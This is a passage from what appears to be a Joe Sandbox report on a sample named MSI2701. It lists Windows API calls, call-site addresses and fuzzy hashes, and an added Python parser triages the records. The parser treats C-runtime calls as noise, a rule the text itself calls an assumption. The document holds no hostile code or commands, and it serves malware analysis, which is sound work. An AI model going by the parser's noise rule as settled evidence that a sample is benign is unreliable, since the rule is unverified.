• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: b6c4ff6e93b26665b5309f70874cbaa3ecb036545aec19ce86080c2ddcbd0d4f
• Instruction ID: 3f8c1bdcae8994d1026984b02c29a0d4dee4494f167a01ee0b975c092c48cebd
• Opcode Fuzzy Hash: b6c4ff6e93b26665b5309f70874cbaa3ecb036545aec19ce86080c2ddcbd0d4f
• Instruction Fuzzy Hash: BE31D374D01218ABCB21DF65D98878DBBB8AF18311F5041EAE81CA7290E7749B858F48

APIs
• LoadResource.KERNEL32(00000000,00000000,C7C71CC4,00000001,00000000,?,00000000,00504460,000000FF,?,004C474D,004C3778,?,00000000,00000000,?), ref: 004C45DB
• LockResource.KERNEL32(00000000,?,00000000,00504460,000000FF,?,004C474D,004C3778,?,00000000,00000000,?,?,?,?,004C3778), ref: 004C45E6
• SizeofResource.KERNEL32(00000000,00000000,?,00000000,00504460,000000FF,?,004C474D,004C3778,?,00000000,00000000,?,?,?), ref: 004C45F4
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Resource$LoadLockSizeof
• String ID:
• API String ID: 2853612939-0
• Opcode ID: 906d294a4cbc434f02a220c3808a12dba402d270a6ee8a50aeec7e4aada55fcb
• Instruction ID: 337cdf0e446b8472719a51b0b7e214a5c1578e10693c370c179d2d6b8d11cac0
• Opcode Fuzzy Hash: 906d294a4cbc434f02a220c3808a12dba402d270a6ee8a50aeec7e4aada55fcb
• Instruction Fuzzy Hash: B811C436A046549BC7248F59D954F7BB7A8E79A725F00462FEC16C3344E63DAC048A94

APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• EnumSystemLocalesW.KERNEL32(004FE237,00000001,00000000,?,-00000050,?,004FE868,00000000,?,?,?,00000055,?), ref: 004FE183
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                            • String ID: hO
                                                                                                                                                            • API String ID: 2417226690-2557914918
                                                                                                                                                            • Opcode ID: fd8a7fa75bdf8609e7a75a27e53e32f9df0c9f7de4e8ff1b6c816830ce635e45
                                                                                                                                                            • Instruction ID: 94e9d4644604a95b2206509d4c50cd9c50eea727133d083b3715b3331a0ce6d5
                                                                                                                                                            • Opcode Fuzzy Hash: fd8a7fa75bdf8609e7a75a27e53e32f9df0c9f7de4e8ff1b6c816830ce635e45
                                                                                                                                                            • Instruction Fuzzy Hash: 4211293A2007099FDB189F3AC8915BBB791FF84719B15442DE64647B50E3757942CB44
                                                                                                                                                            APIs
                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,004F4E3F,?,20001004,00000000,00000002,?,?,004F4441), ref: 004F76E3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2299586839-2395104290
                                                                                                                                                            • Opcode ID: f033e463de4589d723b2659af29fb0c2ae3ff31154554a5b4a1027686cf7e020
                                                                                                                                                            • Instruction ID: bd47b17c3c811fe80c450c928a13b648c792afc6da727f1c05abe94ff3e003e2
                                                                                                                                                            • Opcode Fuzzy Hash: f033e463de4589d723b2659af29fb0c2ae3ff31154554a5b4a1027686cf7e020
                                                                                                                                                            • Instruction Fuzzy Hash: D3E04F3654861DBBCF122F61DC08ABE3E26EF487A0F004016FE0565261CB3D9921AAD9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                            • Instruction ID: 6ed22beed5a96dd4eb3f2724738b7cd9d15095dd7d891ba586c3b004edcbcd79
                                                                                                                                                            • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                            • Instruction Fuzzy Hash: 48F16271E002599FDF14CFAAD980AAEB7B1FF88315F15826AE815A7391D7349E01CF84
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0$TQ
                                                                                                                                                            • API String ID: 0-1234872255
                                                                                                                                                            • Opcode ID: e312e784168ff8d0ae80082596154f8691f7869a76059560e90113d9a4bc6084
                                                                                                                                                            • Instruction ID: 57610e852c865d2fbf47344143c4e3e64c04ec41de6e7cbd207c660ba20932a1
                                                                                                                                                            • Opcode Fuzzy Hash: e312e784168ff8d0ae80082596154f8691f7869a76059560e90113d9a4bc6084
                                                                                                                                                            • Instruction Fuzzy Hash: BAC1BE749006858FCB24CE2AC49467FBBB1BF05306F244A1FD49697351C728FD66CB5A
                                                                                                                                                            APIs
                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,004F7F64,00000000,00000000,00000000), ref: 004F7E23
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 565725191-0
                                                                                                                                                            • Opcode ID: 232a98e091ff6db2d17b6929bdb668d775f71dda3316be7dda185b1fa1d3f6a1
                                                                                                                                                            • Instruction ID: 3220fc75d8fcdf15a8e257f50fc88293eaf5378732afa83f29ddb3454721165f
                                                                                                                                                            • Opcode Fuzzy Hash: 232a98e091ff6db2d17b6929bdb668d775f71dda3316be7dda185b1fa1d3f6a1
                                                                                                                                                            • Instruction Fuzzy Hash: FAC14772E04119ABDB10AB65DC02ABFBBB9EF05714F51405BFA00EB291E77C9E41C798
                                                                                                                                                            APIs
                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004F84B8,?,?,00000008,?,?,005014E4,00000000), ref: 004F86EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                            • Opcode ID: f9b62fe0c9d9b6473b71a0a9b4fafc23e02c37c9491f9ae462bbdb833fd8df04
                                                                                                                                                            • Instruction ID: a964cc155e9a30906a7af58cbda9e42fdaa9f1eb50a3eb231b932763789229ef
                                                                                                                                                            • Opcode Fuzzy Hash: f9b62fe0c9d9b6473b71a0a9b4fafc23e02c37c9491f9ae462bbdb833fd8df04
                                                                                                                                                            • Instruction Fuzzy Hash: 0BB12A31610608DFD714CF28C48AB657BE0FF45364F25865DEA9ACF2A1CB39E952CB44
                                                                                                                                                            APIs
                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004E35BF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                            • Opcode ID: 3594091b2af8dbcf13c46a4da996d19f565581bca9a32a4468ee16862007a022
                                                                                                                                                            • Instruction ID: d701063ed46d04caaa6a19d45a325527e412b9e7ebb7057c3d4879f97f71bf6a
                                                                                                                                                            • Opcode Fuzzy Hash: 3594091b2af8dbcf13c46a4da996d19f565581bca9a32a4468ee16862007a022
                                                                                                                                                            • Instruction Fuzzy Hash: C7517DB1900215CFDB26CF6AE8897AABBF0FB08346F14C42AC805EB350D3799A04DF54
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7e6a7f534cd6cfdf7cc391b075cd49db2a616ab825ec4671b744ed6eb4296970
                                                                                                                                                            • Instruction ID: 60ebe0ea72276ba3d401d182db9c3a34a1ebffd3acacde19faa1e0e1cef558df
                                                                                                                                                            • Opcode Fuzzy Hash: 7e6a7f534cd6cfdf7cc391b075cd49db2a616ab825ec4671b744ed6eb4296970
                                                                                                                                                            • Instruction Fuzzy Hash: C931F7B290021DAFCB20DFA9CCC5DBBB77DEB85354F14415AFA15D7240EA34AD408BA4
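The function records above all follow one layout (an optional APIs list with call arguments and a "ref:" call-site address, the Memory Dump Source the function was lifted from, and the Similarity block with its opcode and instruction fuzzy hashes). The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it turns that text into records, then applies a triage heuristic. The heuristic is an assumption of this example, not a statement from the report: GetLastError/SetLastError, EnumSystemLocalesW, GetLocaleInfoW, GetTimeZoneInformation, IsProcessorFeaturePresent and RaiseException are all called by the statically linked MSVC C runtime during startup and locale/time-zone initialisation, so a function whose only imports are these is weak evidence on its own, while the decoded constants (0xC000000D is STATUS_INVALID_PARAMETER, feature 0x0A is PF_XMMI64_INSTRUCTIONS_AVAILABLE) confirm the CRT reading. The sample input is copied, abridged, from the records on this page; any record containing an API outside that set is flagged for manual review.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Three function records copied (abridged) from the report above, in the
# exact layout the page uses, so the parser exercises the real format.
SAMPLE = """\
APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• EnumSystemLocalesW.KERNEL32(004FE237,00000001,00000000,?,-00000050,?,004FE868,00000000,?,?,?,00000055,?), ref: 004FE183
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID: hO
• API String ID: 2417226690-2557914918
• Instruction Fuzzy Hash: 4211293A2007099FDB189F3AC8915BBB791FF84719B15442DE64647B50E3757942CB44
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004F84B8,?,?,00000008,?,?,005014E4,00000000), ref: 004F86EA
Similarity
• API ID: ExceptionRaise
• Instruction Fuzzy Hash: 0BB12A31610608DFD714CF28C48AB657BE0FF45364F25865DEA9ACF2A1CB39E952CB44
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004E35BF
Similarity
• API ID: FeaturePresentProcessor
• Instruction Fuzzy Hash: C7517DB1900215CFDB26CF6AE8897AABBF0FB08346F14C42AC805EB350D3799A04DF54
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<val>.*)$")

# Assumption (analyst heuristic, not from the report): APIs the MSVC CRT calls
# on its own during startup, locale and time-zone initialisation.
CRT_NOISE = {"GetLastError", "SetLastError", "EnumSystemLocalesW", "GetLocaleInfoW",
             "GetTimeZoneInformation", "IsProcessorFeaturePresent", "RaiseException"}
# Documented Windows constants, keyed on (API, first argument).
CONST_NAMES = {("RaiseException", 0xC000000D): "STATUS_INVALID_PARAMETER",
               ("IsProcessorFeaturePresent", 0x0A): "PF_XMMI64_INSTRUCTIONS_AVAILABLE"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]          # None where the report prints '?'
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # 'API ID', 'Offset', 'Instruction Fuzzy Hash', ...

def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)   # handles "-00000050" too

def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; each ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        line = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
                cur.apis.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                        int(m["sub"], 16) if m["sub"] else None))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":   # "<dump>, Offset: 004C0000, based on PE: true"
            parts = [p.strip() for p in val.split(",")]
            cur.meta["Source File"] = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                cur.meta[k.strip()] = int(v, 16) if k.strip() == "Offset" else v.strip()
        elif key == "Associated":
            cur.meta.setdefault("Associated", []).append(val)
        else:
            cur.meta[key] = val
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    if cur.apis or cur.meta:          # tolerate a truncated final record
        records.append(cur)
    return records

def triage(rec: FunctionRecord) -> list:
    """(api, 'crt-noise' | 'review', decoded first-argument constant or None) per call."""
    out = []
    for c in rec.apis:
        first = c.args[0] if c.args else None
        out.append((c.api, "crt-noise" if c.api in CRT_NOISE else "review",
                    CONST_NAMES.get((c.api, first))))
    return out

def needs_review(records: List[FunctionRecord]) -> List[FunctionRecord]:
    return [r for r in records if any(t[1] == "review" for t in triage(r))]

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.meta.get("API ID"), triage(r))
```

Run against the three records it reports every call as CRT noise and an empty review list; on the full page the same script points straight at the functions whose API ID is not explained by the runtime, which is where analyst time is better spent.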
APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE4DE
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: b25611fa9c8f5fdab98e1110545faacdac9257d4ebcdb48ec52e9dde47af9f16
• Instruction ID: 4d7ea4333e2ca0f9cab0db998c85983219d7c26a726eb0fec8b4b78d68102745
• Opcode Fuzzy Hash: b25611fa9c8f5fdab98e1110545faacdac9257d4ebcdb48ec52e9dde47af9f16
• Instruction Fuzzy Hash: 9321A17260421AABDB289F66DC41ABB73A8EF04319B10106FFA01C6261EA78ED048758
APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004FE453,00000000,00000000,?), ref: 004FE6E5
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: ed288dd16ea31bcc22f9675efe911344009e982800ff44d6837a47506be38a6d
• Instruction ID: f180f9ffcdd2494bcfa4b86727ce78705436ab62a846cd1c65a13276a2cf9837
• Opcode Fuzzy Hash: ed288dd16ea31bcc22f9675efe911344009e982800ff44d6837a47506be38a6d
• Instruction Fuzzy Hash: D6F0233650011ABBDB286752CC05BBF77D8EB40755F15046ADF05E3290DA3CFD01C594
APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• EnumSystemLocalesW.KERNEL32(004FE48A,00000001,?,?,-00000050,?,004FE82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004FE1F6
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 4ba80e1ac895ffa27be1f70fb3094cf20598fe86d0a8ecbd11222f938b39f329
• Instruction ID: c8808421617b5b7969bf4f4f40fe5db808cc30b7fc40113fde7d519a49bdfbac
• Opcode Fuzzy Hash: 4ba80e1ac895ffa27be1f70fb3094cf20598fe86d0a8ecbd11222f938b39f329
• Instruction Fuzzy Hash: 17F0463620030C5FCB246F3B8C85A7B7B94FF80728F05442EFB018B6A0D6B5AC02CA58
APIs
  • Part of subcall function 004F1C9A: EnterCriticalSection.KERNEL32(-0051DE50,?,004F3576,?,0051A078,0000000C,004F3841,?), ref: 004F1CA9
• EnumSystemLocalesW.KERNEL32(004F7125,00000001,0051A1D8,0000000C,004F7554,00000000), ref: 004F716A
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 42f31b3095a28d267ae6b287767813e06844e7bb095449989b068d8b1767f137
• Instruction ID: f03075f32c98635215ae5e2b6394c2b2e3569e2cd5eb0e409a003384d51b1e07
• Opcode Fuzzy Hash: 42f31b3095a28d267ae6b287767813e06844e7bb095449989b068d8b1767f137
• Instruction Fuzzy Hash: 28F0AF72A40204DFD701DF99D906BAC7BF0FB48325F00815AF900DB2A0D7795904DF44
APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• EnumSystemLocalesW.KERNEL32(004FE01F,00000001,?,?,?,004FE88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004FE0FD
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 4f286635ac117e38fa802be0114a96b85b688c0504455eeb229fbfcc9f4716bb
• Instruction ID: 30816253a75bf95968da4f96beee30250ae17e8acb686cff6b1a42605146936b
• Opcode Fuzzy Hash: 4f286635ac117e38fa802be0114a96b85b688c0504455eeb229fbfcc9f4716bb
• Instruction Fuzzy Hash: 1FF05C3530020D5BCB14AF36C84567A7F94EFC1711F060059EB058B260C6799842C754
APIs
• GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,004E00E2,00000000,00000000,00000004,004DED14,00000000,00000004,004DF127,00000000,00000000), ref: 004E2410
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
